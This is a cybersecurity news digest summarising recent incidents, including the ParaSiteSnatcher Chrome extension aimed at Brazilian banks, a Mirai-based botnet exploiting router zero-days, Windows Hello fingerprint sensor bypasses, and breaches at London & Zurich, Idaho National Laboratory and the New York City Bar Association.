Banks in Brazil are once again in the crosshair owing to a malicious Chrome extension known as ParaSiteSnatcher. Attackers are targeting Latin American users, particularly in Brazil, by exploiting a Chrome browser API to intercept and exfiltrate sensitive data, including banking details. In another headline, Akamai laid bare the details of a Mirai-based DDoS botnet, a malware sample based on the hailBot Mirai variant, and a web shell. The botnet leverages a pair of (undisclosed) zero-day flaws in routers and Network Video Recorder (NVR) devices with default admin credentials.

Meanwhile, security researchers shared details of an exploit against the top fingerprint sensors used for Windows Hello authentication in laptops. The research involved extensive reverse engineering of both software and hardware, uncovering cryptographic implementation flaws, and understanding proprietary communication protocols.

Top Breaches Reported in the Last 24 Hours

Ransomware attack on debit collection firm

London & Zurich, a direct debit collection firm, experienced a ransomware attack causing severe disruptions that led to significant backlogs, affecting cash flow for businesses relying on it. The outage left customers unable to process direct debit payments and ??customers could not even reach any support services via the company's phone lines. One managed service provider reported a backlog of over $124,000.

U.S nuclear reactor lab hit

The Idaho National Laboratory (INL) suffered a data breach, exposing employee information, including addresses, SSNs, bank account details, names, and dates of birth. The breach impacted the Oracle HCM system servers supporting INL's Human Resources applications. The hacker group SiegedSec claimed responsibility, leaked the stolen data, and posted screenshots of internal INL tools.

Bar association members’ data compromised

The New York City Bar Association disclosed a cyberattack that occurred nearly a year ago, with data of over 27,000 members and employees compromised. An investigation revealed that hackers gained access to internal files between December 2 and December 24, 2022. The Cl0p ransomware gang claimed responsibility for the attack in January. Financial account details and payment card information, including security codes or PINs, were reportedly leaked.

Top Malware Reported in the Last 24 Hours

LitterDrifter drifts further and beyond

The notorious Russian-state hacking group Gamaredon is expanding its victim reach with the LitterDrifter worm. The adversaries employ USB-based espionage malware for broad-scale data collection. The malware is comprised of two primary components — a spreading module and a C2 module, supporting a large-scale operation. LitterDrifter has infected organizations in Ukraine, the U.S., Vietnam, Chile, Poland, and Germany.

ParaSiteSnatcher: a malicious chrome extension

Security researchers have discovered a sophisticated malicious Google Chrome extension named ParaSiteSnatcher. Designed to target users in Latin America, particularly Brazil, this extension allows threat actors to monitor, manipulate, and exfiltrate sensitive information, including data from Banco do Brasil and Caixa Econômica Federal. ParaSiteSnatcher exploits the Chrome Browser API to intercept and exfiltrate sensitive information, especially from POST requests containing account and financial details.

Zero-Day exploits fuel new DDoS attacks

A new Mirai-based DDoS botnet campaign has been discovered exploiting two zero-day vulnerabilities, enabling remote code execution by targeting vulnerable routers and video recorders. The botnet, InfectedSlurs, employs racial language in command-and-control servers. Another malware variant in relation to the hailBot Mirai variant was also spotted in the wild. Security experts also revealed a web shell, wso-ng, concealing its login interface behind a 404 error page.

Top Vulnerabilities Reported in the Last 24 Hours

Biometric flaws risk device security

Security researchers at Blackwing Intelligence have identified critical vulnerabilities affecting the Windows Hello authentication system on Dell Inspiron 15, Lenovo ThinkPad T14, and Microsoft Surface Pro X laptops. The flaws found in fingerprint sensors from Goodix, Synaptics, and ELAN, enabled attackers to bypass fingerprint authentication. Exploiting weaknesses in the "Match on Chip" (MoC) fingerprint sensors, researchers discovered methods for Adversary-in-the-Middle (AitM) attacks, particularly on the ELAN sensor.